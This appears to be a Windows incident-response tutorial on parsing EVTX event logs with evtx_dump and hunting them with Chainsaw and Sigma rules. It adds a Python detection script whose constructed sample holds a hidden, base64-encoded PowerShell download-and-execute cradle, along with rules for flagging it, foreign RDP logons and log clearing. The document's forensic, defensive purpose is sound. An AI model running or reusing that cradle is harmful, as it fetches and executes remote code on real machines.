Windows XML EventLog (EVTX)
EVTX is the binary event log format used by Windows since Vista. The logs live under C:\Windows\System32\winevt\Logs\ (e.g. Security.evtx, System.evtx, Microsoft-Windows-PowerShell%4Operational.evtx) and are among the first artifacts collected during incident response.
Read EVTX in Linux
We can parse a .evtx file in Linux using evtx_dump, the command-line tool from the omerbenamram/evtx project.
wget https://github.com/omerbenamram/evtx/releases/download/v0.8.1/evtx_dump-v0.8.1-x86_64-unknown-linux-gnu -O evtx_dump
chmod +x evtx_dump
./evtx_dump example.evtx > parsed.xml
The default output is XML. Pass -o jsonl to get one JSON object per event, which is easier to filter with jq or a script:
./evtx_dump -o jsonl example.evtx > parsed.jsonl
Now we can search the parsed text for events of interest, e.g. Event ID 4624 (logon), 4688 (process creation) or 1102 (audit log cleared).
Search Suspicious Activity in EVTX
Chainsaw is a command-line tool to rapidly search and hunt through Windows forensic artifacts such as EVTX files. It runs Sigma rules (and its own built-in rules) against a directory of logs.
git clone https://github.com/WithSecureLabs/chainsaw.git
cd chainsaw
cargo build --release
git clone https://github.com/SigmaHQ/sigma.git
./target/release/chainsaw hunt evtx_files/ -r rules/ -s sigma/rules --mapping mappings/sigma-event-logs-all.yml
The binary is built at target/release/chainsaw. The Sigma rules come from the separate SigmaHQ repository, and the mapping file in Chainsaw's mappings/ directory translates Sigma log-source fields to EVTX field names; without it the Sigma rules will not match anything.
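The following is an added example (not code from this page, evtx_dump or Chainsaw) showing what "search the parsed output for suspicious activity" looks like in code: a small rule-based hunt over evtx_dump's -o jsonl output. It assumes the JSONL shape evtx_dump produces (a top-level "Event" object with "System" and "EventData"), normalises the two shapes EventID takes, and applies three rules: encoded PowerShell in 4688 process creation (decoding the UTF-16LE payload and ignoring -e switches that are not really encoded commands), RDP logons (4624, LogonType 10) from outside a list of internal ranges, and Security log clearing (1102). The sample records are constructed for the example; INTERNAL_NETS is an assumed allow-list you would replace with your own ranges.

```python
"""Hunt through evtx_dump JSONL output for a few suspicious patterns."""
import base64
import ipaddress
import json
import re
import sys

# Constructed sample records in the shape `evtx_dump -o jsonl` emits (one JSON
# object per line, "Event" -> "System" / "EventData"). Not real log data.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')".encode("utf-16-le")
).decode()


def _rec(record_id, event_id, data):
    return json.dumps({"Event": {
        "System": {"Provider": {"#attributes": {"Name": "Microsoft-Windows-Security-Auditing"}},
                   "EventID": event_id, "EventRecordID": record_id,
                   "TimeCreated": {"#attributes": {"SystemTime": "2024-05-01T10:00:00Z"}},
                   "Channel": "Security", "Computer": "WS01"},
        "EventData": data}})


SAMPLE_JSONL = "\n".join([
    _rec(1, 4688, {"NewProcessName": "C:\\Windows\\System32\\notepad.exe",
                   "CommandLine": "notepad.exe C:\\notes.txt", "SubjectUserName": "alice"}),
    _rec(2, 4688, {"NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                   "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}",
                   "SubjectUserName": "alice"}),
    _rec(3, 4624, {"TargetUserName": "bob", "LogonType": 2, "IpAddress": "-"}),
    _rec(4, 4624, {"TargetUserName": "Administrator", "LogonType": 10, "IpAddress": "203.0.113.45"}),
    # Some providers wrap EventID with a Qualifiers attribute; the real 1102 keeps
    # its details under UserData, which this rule does not need.
    _rec(5, {"#attributes": {"Qualifiers": 0}, "#text": 1102}, {}),
])

# Assumed "known internal" ranges; replace with the ranges of the environment under investigation.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "::1/128")]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
_ENC_RE = re.compile(r"[-/]e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def event_id(event):
    """EventID is a bare int, or {"#text": n, "#attributes": {...}} when Qualifiers are set."""
    eid = event["System"]["EventID"]
    return int(eid["#text"] if isinstance(eid, dict) else eid)


def iter_events(jsonl_text):
    for line in jsonl_text.splitlines():
        if line.strip():
            yield json.loads(line)["Event"]


def data(event, key, default=""):
    # evtx_dump keeps the binary XML types (LogonType is an int, IpAddress a str); normalise to str.
    return str((event.get("EventData") or {}).get(key, default))


def rule_encoded_powershell(event):
    if event_id(event) != 4688:
        return None
    m = _ENC_RE.search(data(event, "CommandLine"))
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # an -e switch (e.g. -ExecutionPolicy) that is not an encoded command
    return f"encoded PowerShell run by {data(event, 'SubjectUserName')}: {decoded}"


def rule_rdp_from_untrusted_ip(event):
    if event_id(event) != 4624 or data(event, "LogonType") != "10":
        return None
    ip = data(event, "IpAddress")
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return None  # "-" placeholder or malformed source
    if any(addr in net for net in INTERNAL_NETS):
        return None
    return f"RDP logon for {data(event, 'TargetUserName')} from {ip}"


def rule_audit_log_cleared(event):
    return "Security audit log cleared" if event_id(event) == 1102 else None


RULES = {"encoded_powershell": rule_encoded_powershell,
         "rdp_from_untrusted_ip": rule_rdp_from_untrusted_ip,
         "audit_log_cleared": rule_audit_log_cleared}


def hunt(jsonl_text):
    """Return (EventRecordID, rule name, detail) for every rule hit, in log order."""
    hits = []
    for ev in iter_events(jsonl_text):
        for name, rule in RULES.items():
            msg = rule(ev)
            if msg:
                hits.append((ev["System"]["EventRecordID"], name, msg))
    return hits


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JSONL
    for rec, name, msg in hunt(text):
        print(f"record {rec}: [{name}] {msg}")
```

Run it as `python hunt.py parsed.jsonl` against real evtx_dump output, or with no argument to hunt the constructed sample. The point of the try/except around the base64 decode is the false-positive case: PowerShell abbreviates switches, so `-e` alone is ambiguous and only a payload that decodes as UTF-16LE should be reported.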